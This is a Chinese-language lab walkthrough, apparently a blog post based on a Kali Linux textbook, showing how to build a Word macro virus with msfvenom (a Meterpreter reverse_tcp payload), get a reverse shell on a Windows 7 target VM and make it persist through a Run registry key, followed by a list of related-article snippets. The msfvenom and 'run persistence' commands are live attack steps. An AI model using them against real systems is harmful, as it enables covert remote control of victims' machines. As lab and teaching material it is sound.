目录

    • 说明
    • 环境准备
    • 步骤
      • 确认攻击机所在网络信息
      • 确认所在网络存活主机信息
      • 构建宏病毒文件
    • 构建宏文件
      • Metasploit
        • 使用resverse_tcp exploit进行攻击
        • 目标靶机打开word宏文件
        • 将宏文件加入系统启动项
          • win7电脑怎么找到注册表
        • 验证随着系统启动而启动,控制不会中断
        • 删除注册表键值,再次验证

说明

按照《Kali Linux2 网络渗透测试实践指南 第二版 》第七章操作
仅供学习讨论使用,请勿进行非法操作

环境准备

“邪灵工作室“公众号”下载作者提供的 windows系统靶机 32bit
到kali 官网下载对应虚拟机并完成安装
上述虚拟机在VM Ware中打开

步骤

确认攻击机所在网络信息

ifconfig


可以看出本机ip地址为 192.168.229.133

确认所在网络存活主机信息

nmap 192.168.229.0/24


可以看出 192.168.229.135和192.168.229.136存活

构建宏病毒文件

使用msfvenom命令一个VBA类型的被控端

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

LHOST为Kali Linux所在的攻击机
生成的内容


构建宏文件

MACRO CODE

PAYLOAD DATA
复制该word宏病毒文件至目标靶机

Metasploit

使用resverse_tcp exploit进行攻击

目标靶机打开word宏文件

攻击主机上监听4444端口,等待反弹会话成功

将宏文件加入系统启动项

使用run persistence命令

meterpreter > run  persistence -X -i  5  -p 4444 -r 192.168.229.133

此处p和r的参数均为LHOST, LPORT,即kali linux这台机器

下图,看目标主机注册表 Run 键值果然被写入了一个 xBGTyPHvfmbdk 的键值,执行后门 vbs 脚本

win7电脑怎么找到注册表

1.点击电脑的运行“开始”键,
2.搜索框里面输入“regedit”,
3.出现注册表程序“regedit.exe”,点击此程序。

验证随着系统启动而启动,控制不会中断

重启windows靶机
打开新的监听

登录windows靶机
结果 成功

删除注册表键值,再次验证

打开新的监听
结果,失败

此处参考渗透测试 ( 4 ) — Meterpreter 命令详解
Meterpreter 的强大之处之一在于它运行于内存中,不易被杀毒软件发现,但只要目标机环境合适,或你对自己的免杀足够自信,可通过该命令写入硬盘,下次目标机启动时,木马将会自启动。
执行过程:创建攻击载荷 -> 攻击载荷植入到目标主机 c:\windows\temp目录下,是一个.vbs的脚本 -> 写目标主机注册表键值实现开机自动运行。

使用Kali Linux Metasploit 复现 word宏相关推荐

  1. kali Linux metasploit进入msfgui

    先打开终端: 输入 msfdb init - - - 然后输入 armitage

  2. Kali Linux 使用Armitage

    目录 说明 安装 扫描网络 Quick Scan (OS detect) 输入网段 扫描结果 图形化ms17_010 先扫描 auxiliary 再攻击 被渗透 图形化metaspliot Meter ...

  3. mac使用被动ftp模式(pasv)_网络安全工程师与白帽子黑客教你:Kali Linux之使用Metasploit进行FTP服务扫描实战...

    本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一.背景介绍 FTP是用来在两台计算机之间传输文件,是Inter ...

  4. Kali Linux 2019.1 发布,Metasploit 更新到 5.0 版本

    百度智能云 云生态狂欢季 热门云产品1折起>>>   Kali Linux 2019.1 发布了,Kali 前身 BackTrack,它是一个基于 Debian 的 Linux 发行 ...

  5. 网络实用技术基础模拟测试2_网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(五)...

    本分享仅做学习交流,请自觉遵守法律法规! 搜索:Kali与编程,学习更多网络攻防干货! 下篇文章将在明天下午五点发布,敬请关注! 一.背景介绍 Metasploit就是一个漏洞框架.它的全称叫做 ...

  6. 渗透测试工程师前景_网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(一)...

    课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali与编程,学习更多网络攻防干货! 3.下篇文章将在明天早上九点发布,敬请关注! 一.背景介绍 Metasploit就是一个漏洞 ...

  7. metasploit连接postgresql的问题(U盘启动kali linux)

    metasploit连接postgresql的问题 由于kali Linux的版本不同,默认情况下对metasploit和postgresql的配置也不相同,导致我们启动metasploit后无法链接 ...

  8. kali linux 2.0下安装ssh和metasploit

    原址 从kali官网下载的kali系统的压缩包(已经装好的vmware虚拟机的压缩包),一般我比较习惯使用ssh客户端连接后使用. 一.开启ssh: kali linux2.0已经安装好ssh,但是不 ...

  9. kali linux手机版下载免root,不需要root在安卓完全安装metasploit

    现在的安卓上有些软件真的是吊得飞起,上次写过一篇利用安卓软件[Linux deploy]安装完整kali Linux2.0,直接完美运行kali安装metasploit,工具啥的基本都有,但是缺点就是 ...

  10. MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...

最新文章

  1. 鑫哥新作品《工资呀》
  2. TensorFlow介绍之TF数据流图
  3. wpf listview mysql_Kivy:使用MySQL的Kivy页面的Listview实现
  4. 前端自动化构建工具Grunt
  5. ED/EP系列5《消费指令》
  6. 计算机辅助工艺设计张胜文,计算机辅助工装设计.ppt
  7. 商品WEB开发的商品定单与存储过程的应用
  8. jQuery中live函数的替代-【jQuery】
  9. 成功修复2G金士顿U盘
  10. JSP中contentType和pageEncoding的区别
  11. python 英语翻译 excel_翻译篇Day2-用python读写Excel–数据图表篇
  12. 【十六】Jmeter:目录介绍
  13. ESP8266安装安信可一体化开发环境
  14. 中国慕课moocpython答案_中国大学慕课mooc2020用Python玩转数据题目答案
  15. Lancet Neurology:长期意识障碍的干预治疗
  16. CSP化学方程式题解
  17. for根据ID去重_汽车ECU参数标定之配置Overlay RAM实现Qorivva MPC57xx系列MCU参数在线标定和代码重映射原理和方法详解...
  18. 大数据技术之Hive 第4章 DDL数据定义语言
  19. 用Python写了一个网易云音乐(附源码、视频教程)
  20. Stack Overflow简单介绍

热门文章

  1. 支持linux的midi键盘,十款人气MIDI键盘推荐,适合各个阶段的音乐人
  2. python实训总结泰坦尼克号重建_Python之泰坦尼克号生存率分析
  3. 用mui索引实现动态数据仿通讯录的功能
  4. html页面右下角添加js广告,javascript实现右下角广告框效果
  5. 人物故事 | 回顾美人建筑师,致世界建筑日
  6. 从零开始学JAVA:一、Java语言概述
  7. 【Opencv综合应用】自制训练集的人脸识别1——拍摄10张人脸图片
  8. java 扫雷 实验报告_java实现简单扫雷
  9. adb官方最新下载链接和常用操作
  10. 《结构分析的有限元法与MATLAB程序设计》笔记